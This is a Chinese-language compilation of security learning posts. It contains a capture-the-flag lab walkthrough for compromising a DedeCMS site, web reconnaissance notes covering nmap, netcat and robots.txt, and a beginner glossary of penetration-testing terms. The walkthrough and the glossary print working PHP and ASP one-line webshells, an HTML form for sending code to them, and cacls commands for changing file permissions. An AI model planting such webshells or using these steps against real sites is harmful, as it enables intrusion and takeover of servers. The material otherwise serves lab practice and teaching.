明
僅供學(xué)習(xí),禁止用于違法行為。請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,如因此產(chǎn)生的一切不良后果與文章作者和本公眾號(hào)無(wú)關(guān)。
題目地址
https://www.ichunqiu.com/experiment/detail?id=51123&source=1&otype=1
題目要求
要求獲取目標(biāo)網(wǎng)站的FLAG信息
開(kāi)啟環(huán)境后的頁(yè)面
根據(jù)提示,我們?cè)L問(wèn)http://file.ichunqiu.com/49ba59ab下載dedeCMS,下載下來(lái)是一個(gè)一鍵爆賬號(hào)密碼的軟件
輸入目標(biāo)地址http://www.test.ichunqiu爆破
得到賬號(hào)和密碼MD5值
對(duì)加密MD5值進(jìn)行解密
在線(xiàn)MD5解密:https://www.somd5.com/
得到密碼:only_system
有賬號(hào)密碼。但是后臺(tái)地址不知道,進(jìn)行后臺(tái)目錄掃描
環(huán)境中tools里自帶了很多的工具,這里找到目錄掃描的工具
這里使用御劍后臺(tái)掃描工具
對(duì)每個(gè)地址進(jìn)行查看,發(fā)現(xiàn),并沒(méi)有我們想要的后臺(tái),嘗試更換字典或掃描器進(jìn)行掃描,發(fā)現(xiàn)還是沒(méi)有后臺(tái)地址
百度找織夢(mèng)cms后臺(tái)的方法
日志暴露后臺(tái)地址
https://blog.csdn.net/forest_fire/article/details/50944689
發(fā)現(xiàn)可以從報(bào)錯(cuò)文件 /data/mysql_error_trace.inc 或 /data/mysqli_error_trace.inc 中,可得到泄露的后臺(tái)路徑,我們?cè)L問(wèn)
http://www.test.ichunqiu/data/mysql_error_trace.inc 發(fā)現(xiàn)有個(gè)目錄
進(jìn)行訪(fǎng)問(wèn),發(fā)現(xiàn)就是后臺(tái)地址
輸入賬號(hào)密碼進(jìn)行登錄,成功進(jìn)入后臺(tái)
下一步我們需要上傳webshell,獲取主機(jī)權(quán)限。
百度進(jìn)行查找獲取webshell方法
https://www.cnblogs.com/milantgh/p/3634550.html
在后臺(tái)界面,我們看到在模板-->標(biāo)簽源碼管理處可以進(jìn)行增加一個(gè)新的標(biāo)簽,也可以對(duì)現(xiàn)有的便簽進(jìn)行編輯
這里,我們對(duì)現(xiàn)有的標(biāo)簽進(jìn)行編輯寫(xiě)入一句話(huà),保存
<?php @eval($_POST['lemonlove7']); ?>
上面也有提示,文件的存放位置
訪(fǎng)問(wèn)一下,使用環(huán)境中自帶的菜刀進(jìn)行連接
成功獲取到shell
在c盤(pán)Documents and Settings(文件和設(shè)置) -->Administrator-->桌面看到了flag~ichunqiu.txt文件
進(jìn)行查看,發(fā)現(xiàn)是空的,但文件大小不為0
在cmd命令中使用type進(jìn)行查看看看 ,發(fā)現(xiàn)是拒絕訪(fǎng)問(wèn),哎,肯定是權(quán)限不夠
使用whoami查看我們現(xiàn)在的用戶(hù)權(quán)限
whoami
發(fā)現(xiàn)我們的全是system即為最高權(quán)限,但是卻還是看不falg~ichunqiu.txt,進(jìn)行百度發(fā)現(xiàn)可能是對(duì)文件的權(quán)限進(jìn)行了設(shè)置
windows下設(shè)置文件及其文件夾權(quán)限的方法:https://www.jb51.net/article/51907.htm
使用cacls命令對(duì)falg~ichunqiu.flag文件權(quán)限進(jìn)行查看,發(fā)現(xiàn)對(duì)system用戶(hù)的權(quán)限是n即為無(wú)權(quán)限
cacls flag~ichunqiu.txt
使用cacls命令對(duì)falg~ichunqiu.flag文件權(quán)限進(jìn)行修改為F
cacls flag~ichunqiu.txt /E /P system:F /C
成功的拿到flag
type flag~ichunqiu.txt
結(jié)尾
和師傅們一起成長(zhǎng),努力學(xué)習(xí)網(wǎng)絡(luò)安全知識(shí)。
文章來(lái)源:鵬組安全
如有侵權(quán),請(qǐng)聯(lián)系我們進(jìn)行刪除
文章目錄
測(cè)試對(duì)象:testphp.vulnweb.com
嘗試在谷歌中搜索:“site: testphp.vulnweb.com”,得到基本的爬蟲(chóng)結(jié)果如下:
使用查詢(xún)發(fā)現(xiàn)了更多有用的信息:
參考:
http://www.mrjoeyjohnson.com/Google.Hacking.Filters.pdf
Web 服務(wù)器指紋是滲透測(cè)試的關(guān)鍵任務(wù)。了解正在運(yùn)行的 web 服務(wù)器的版本和類(lèi)型能夠讓測(cè)試人員確定已知的漏洞以及在測(cè)試過(guò)程中使用適當(dāng)?shù)姆椒ā?/p>
a)黑盒測(cè)試:
確認(rèn)web 服務(wù)器身份的最簡(jiǎn)單最基本的方式是利用netcat查看 HTTP 響應(yīng)報(bào)頭中的服務(wù)器字段。
b)測(cè)試對(duì)象:
nc google.com 80
GET
/ HTTP/1.1
Host: google.com
enter
enter
c)自動(dòng)測(cè)試工具:
httprint, Burpsuite
d)在線(xiàn)測(cè)試:
https://www.netcraft.com/
e)示例:
參考:
網(wǎng)絡(luò)蜘蛛/機(jī)器人/爬蟲(chóng)檢索 (訪(fǎng)問(wèn)) 一個(gè)網(wǎng)頁(yè), 然后遞歸遍歷超鏈接, 以檢索進(jìn)一步的 web 內(nèi)容。他們的行為是由web根目錄中robots.txt文件的Robots Exclusion Protocol指定的。
測(cè)試對(duì)象:abc.com/robots.txt
工具: 利用wget(例如: wget http://google.com/robots.txt)
參考:http://www.robotstxt.org/
示例:http://local/mutillidae/robots.txt
Tag位于每個(gè) HTML 文檔的 HEAD 部分, 并且應(yīng)該在一個(gè) web 站點(diǎn)上的下述事件中保持一致:機(jī)器人/蜘蛛/爬蟲(chóng)的起始點(diǎn)不是從 webroot 以外的文檔鏈接開(kāi)始的。
網(wǎng)絡(luò)蜘蛛/機(jī)器人/爬蟲(chóng)可以故意忽略 “<META NAME=”ROBOTS”>” tag。
工具: BurpSuite
a) url:
b) 端口:
最基本和最簡(jiǎn)單的方法是使用端口掃描儀 (如 nmap)。例如:
nmap 0-65535 192.168.1.1
c) 域名:
cmd
nslookup
all
set type=all
example.com
http://searchdns.netcraft.com/?host
-Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (require free
membership)
– MSN search: http://search.msn.com syntax: “ip:x.x.x.x” (without the quotes) o webhosting info: http://whois.webhosting.info/
-DNSstuff: http://www.dnsstuff.com/
d) 谷歌hack技術(shù)
示例:
e) 工具
對(duì)于程序員來(lái)說(shuō), 在源代碼中添加詳細(xì)注釋和元數(shù)據(jù)是非常普遍的,甚至是推薦的。但是, HTML 代碼中包含的注釋和元數(shù)據(jù)可能會(huì)對(duì)潛在攻擊者暴露內(nèi)部信息。應(yīng)對(duì)源代碼中的注釋和元數(shù)據(jù)進(jìn)行審查以確定是否泄露了任何信息。
工具:
請(qǐng)求:
響應(yīng):
工具:
一些注意事項(xiàng):
在開(kāi)始安全測(cè)試之前, 了解應(yīng)用程序的結(jié)構(gòu)是至關(guān)重要的。如果不徹底了解應(yīng)用程序的布局, 就不可能對(duì)其進(jìn)行徹底的測(cè)試。
a)測(cè)試目的
b)自動(dòng)蜘蛛工具
c)自動(dòng)化蜘蛛示例
Web 框架指紋是信息采集過(guò)程中的一個(gè)重要子任務(wù)。了解框架的類(lèi)型會(huì)有很大的優(yōu)勢(shì),特別是當(dāng)這種類(lèi)型已經(jīng)被滲透測(cè)試過(guò)。不僅是版本中已知的漏洞使得指紋處理如此重要, 框架以及已知文件結(jié)構(gòu)中的特定錯(cuò)誤同樣如此。
a) 黑盒測(cè)試
為了定義當(dāng)前框架, 有幾個(gè)最常見(jiàn)的位置可供查找
b) HTTP 標(biāo)頭
c) Cookies
確定當(dāng)前 web 框架的另一個(gè)類(lèi)似的、更可靠的方法是特定框架的 cookie。
d) HTML 源代碼
此技術(shù)基于在 HTML 頁(yè)面源代碼中查找某些模式。我們可以找到很多信息, 幫助測(cè)試人員識(shí)別特定的 web 應(yīng)用程序。
e)特定文件和文件夾
每個(gè)應(yīng)用程序在服務(wù)器上都有自己的特定文件和文件夾結(jié)構(gòu)。我們可以使用工具或手動(dòng)訪(fǎng)問(wèn)它們。
f)Dirbusting 示例
https://www.exploit-db.com/ghdb/4675/
g)常見(jiàn)應(yīng)用程序標(biāo)識(shí)符
h)Nikto
i)Whatweb
https://packetstormsecurity.com/files/download/146830/web-application-security-testing.pdf
來(lái)也慚愧,菜鳥(niǎo)小白已經(jīng)干了三年安全產(chǎn)品的測(cè)試,但是對(duì)于滲透測(cè)試都不曾好好了解,一直停留在基礎(chǔ)功能測(cè)試和自動(dòng)化測(cè)試的摸索上。正好我們組內(nèi)在組織滲透測(cè)試的全套課程學(xué)習(xí),將會(huì)從最基礎(chǔ)的內(nèi)容開(kāi)始學(xué)起,學(xué)習(xí)的內(nèi)容菜鳥(niǎo)小白也會(huì)整理出來(lái),一起分享。
今天我們一起來(lái)看看一些基礎(chǔ)概念吧。
基礎(chǔ)概念
1、腳本(asp、php、jsp)
ASP:ASP即Active Server Pages,是Microsoft公司開(kāi)發(fā)的服務(wù)器端腳本環(huán)境,可用來(lái)創(chuàng)建動(dòng)態(tài)交互式網(wǎng)頁(yè)并建立強(qiáng)大的web應(yīng)用程序。當(dāng)服務(wù)器收到對(duì)ASP文件的請(qǐng)求時(shí),它會(huì)處理包含在用于構(gòu)建發(fā)送給瀏覽器的HTML(Hyper Text Markup Language,超文本標(biāo)記語(yǔ)言)網(wǎng)頁(yè)文件中的服務(wù)器端腳本代碼。除服務(wù)器端腳本代碼外,ASP文件也可以包含文本、HTML(包括相關(guān)的客戶(hù)端腳本)和com組件調(diào)用。
PHP:PHP即“超文本預(yù)處理器”,是一種通用開(kāi)源腳本語(yǔ)言。PHP是在服務(wù)器端執(zhí)行的腳本語(yǔ)言,與C語(yǔ)言類(lèi)似,是常用的網(wǎng)站編程語(yǔ)言。
JSP:JSP(全稱(chēng)JavaServer Pages)是由Sun Microsystems公司主導(dǎo)創(chuàng)建的一種動(dòng)態(tài)網(wǎng)頁(yè)技術(shù)標(biāo)準(zhǔn)。JSP部署于網(wǎng)絡(luò)服務(wù)器上,可以響應(yīng)客戶(hù)端發(fā)送的請(qǐng)求,并根據(jù)請(qǐng)求內(nèi)容動(dòng)態(tài)地生成HTML、XML或其他格式文檔的Web網(wǎng)頁(yè),然后返回給請(qǐng)求者。
2、html(css、js、html)
html:HTML稱(chēng)為超文本標(biāo)記語(yǔ)言,是一種標(biāo)識(shí)性的語(yǔ)言。它包括一系列標(biāo)簽.通過(guò)這些標(biāo)簽可以將網(wǎng)絡(luò)上的文檔格式統(tǒng)一,使分散的Internet資源連接為一個(gè)邏輯整體。HTML文本是由HTML命令組成的描述性文本,HTML命令可以說(shuō)明文字,圖形、動(dòng)畫(huà)、聲音、表格、鏈接等。
3、HTTP協(xié)議
HTTP:http是一個(gè)簡(jiǎn)單的請(qǐng)求-響應(yīng)協(xié)議,它通常運(yùn)行在TCP之上。它指定了客戶(hù)端可能發(fā)送給服務(wù)器什么樣的消息以及得到什么樣的響應(yīng)。請(qǐng)求和響應(yīng)消息的頭以ASCII碼形式給出;而消息內(nèi)容則具有一個(gè)類(lèi)似MIME的格式。
4、CMS(B/S)
CMS:內(nèi)容管理系統(tǒng)(content management system,CMS),我們這邊一般使用的B/S架構(gòu),也就是瀏覽器訪(fǎng)問(wèn)的方式。另外還有一種C/S架構(gòu),就是通過(guò)應(yīng)用程序的訪(fǎng)問(wèn)方式。
5、MD5
MD5:MD5信息摘要算法(英語(yǔ):MD5 Message-Digest Algorithm),一種被廣泛使用的密碼散列函數(shù),可以產(chǎn)生出一個(gè)128位(16字節(jié))的散列值(hash value),用于確保信息傳輸完整一致。滲透測(cè)試中一般密碼的解碼需要使用。
6、其它概念
肉雞:被黑客入侵并被長(zhǎng)期駐扎的計(jì)算機(jī)或服務(wù)器
抓雞:利用使用量大的程序的漏洞,使用自動(dòng)化方式獲取肉雞的行為
webshell:通過(guò)web入侵的一種腳本工具,可以據(jù)此對(duì)網(wǎng)站服務(wù)進(jìn)行一定程度的控制
漏洞:硬件、軟件、協(xié)議等可利用的安全缺陷,可能被攻擊者利用,對(duì)數(shù)據(jù)進(jìn)行篡改、控制等。
一句話(huà)木馬:通過(guò)向服務(wù)器提交一句簡(jiǎn)短的代碼,配合本地客戶(hù)端實(shí)現(xiàn)webshell功能的木馬。
舉例:
<%eval request("pass")%>
<%execute(request("pass"))%>
其中request("pass")接收客戶(hù)端提交的數(shù)據(jù),pass為執(zhí)行命令的參數(shù)值。
eval/execute,函數(shù)執(zhí)行客戶(hù)端命令的內(nèi)容
又如:PHP的一句話(huà)木馬
<?php eval($_POST[123]);?>
下面的代碼可以用POST的方式提交PHP語(yǔ)句,利用php腳本的各種函數(shù),就可以實(shí)現(xiàn)執(zhí)行系統(tǒng)命令、修改數(shù)據(jù)庫(kù)、增刪改查等各種功能。
<form method=post action=http://木馬地址>
<textarea name=123>
//這里寫(xiě)PHP代碼
phpinfo();
</textarea>
<input type=submit>
</form>
提權(quán):操作系統(tǒng)低權(quán)限的賬戶(hù)將自己提升為管理員權(quán)限使用的方法。
后門(mén):黑客為了對(duì)主機(jī)進(jìn)行長(zhǎng)期的控制沒(méi)在機(jī)器上種植的一段程序或留下的一個(gè)“入口”
跳板:使用肉雞IP來(lái)實(shí)施攻擊其他目標(biāo),以便更好的隱藏自己的身份信息
旁站:同一個(gè)物理服務(wù)器下搭建的多個(gè)網(wǎng)站。如:服務(wù)器下有三個(gè)網(wǎng)站A、B、C,B和C就是A的旁站。
旁站入侵:即同服務(wù)器下的網(wǎng)址入侵,入侵之后可以通過(guò)提權(quán)跨目錄等手段拿到目標(biāo)網(wǎng)址的權(quán)限。常見(jiàn)的旁站查詢(xún)工具有:WebRobot、御劍、明小子和web在線(xiàn)查詢(xún)等。
C段入侵:即同C段下服務(wù)器入侵。如目標(biāo)IP為192.168.1.253入侵192.168.1.*的任意一臺(tái)機(jī)器,然后利用一些黑客工具嗅探獲取在網(wǎng)上傳輸?shù)母鞣N信息。常用的工具有:Cain(Windows)、Sniffit(UNIX)、Snoop、tcpdump、dsniff等
滲透測(cè)試
黑盒測(cè)試:在未授權(quán)的情況,模擬黑客的攻擊方法和思維方式,來(lái)評(píng)估計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)可能存在的安全風(fēng)險(xiǎn)。黑盒測(cè)試考驗(yàn)的是綜合能力(OS、database、script、code、思路和社工)。
白盒測(cè)試:從內(nèi)部發(fā)起,偏向于代碼審計(jì)
APT攻擊:Advanced Persistent Threat,高級(jí)可持續(xù)性攻擊,是指組織(特別是政府)或者小團(tuán)體利用先進(jìn)的攻擊手段對(duì)特定目標(biāo)進(jìn)行長(zhǎng)期持續(xù)性網(wǎng)絡(luò)攻擊的攻擊形式,具有以下特點(diǎn):
1.極強(qiáng)的隱蔽性
2.潛伏期長(zhǎng),持續(xù)性強(qiáng)
3.目標(biāo)性強(qiáng)
滲透測(cè)試的特點(diǎn)
充滿(mǎn)挑戰(zhàn)與刺激;
思路和經(jīng)驗(yàn)積累往往決定成敗;
滲透測(cè)試的流程
滲透測(cè)試:更全面的找出服務(wù)器的問(wèn)題,更傾向于保護(hù)
明確目標(biāo)——信息收集——漏洞探測(cè)——漏洞驗(yàn)證——信息分析——獲取所需——信息整理——形成報(bào)告
明確目標(biāo):范圍、規(guī)則、需求
信息收集:基礎(chǔ)、系統(tǒng)、應(yīng)用、版本(版本漏洞)、服務(wù)、人員(密碼破解)、防護(hù)
漏洞探測(cè):系統(tǒng)漏洞、webserver漏洞、web應(yīng)用漏洞、其它端口服務(wù)漏洞、通信安全
漏洞驗(yàn)證:自動(dòng)化驗(yàn)證、手工驗(yàn)證、試驗(yàn)驗(yàn)證、登錄猜測(cè)、業(yè)務(wù)漏洞驗(yàn)證、公開(kāi)資源的利用
信息分析:精準(zhǔn)打擊、繞過(guò)防御機(jī)制、定制攻擊路徑、繞過(guò)檢測(cè)機(jī)制、繞過(guò)代碼
獲取所需:實(shí)施攻擊、獲取內(nèi)部信息、進(jìn)一步滲透、持續(xù)性存在*、清理痕跡
信息整理:整理滲透工具、整理收集信息、整理
形成報(bào)告:按需整理、補(bǔ)充介紹、修補(bǔ)建議
如果可以的話(huà),請(qǐng)幫忙點(diǎn)擊下方廣告,給菜鳥(niǎo)小白眾籌一點(diǎn)電費(fèi),謝謝~
*請(qǐng)認(rèn)真填寫(xiě)需求信息,我們會(huì)在24小時(shí)內(nèi)與您取得聯(lián)系。